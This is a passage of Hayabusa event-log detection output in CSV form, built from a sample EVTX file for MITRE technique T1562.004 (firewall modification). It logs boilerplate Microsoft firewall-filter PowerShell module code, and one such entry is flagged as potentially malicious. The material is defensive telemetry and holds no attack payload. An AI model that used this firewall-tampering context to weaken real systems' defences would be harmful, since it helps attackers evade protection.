$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters 
{ param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, 
$myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] 
[int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) 
} $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.974 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
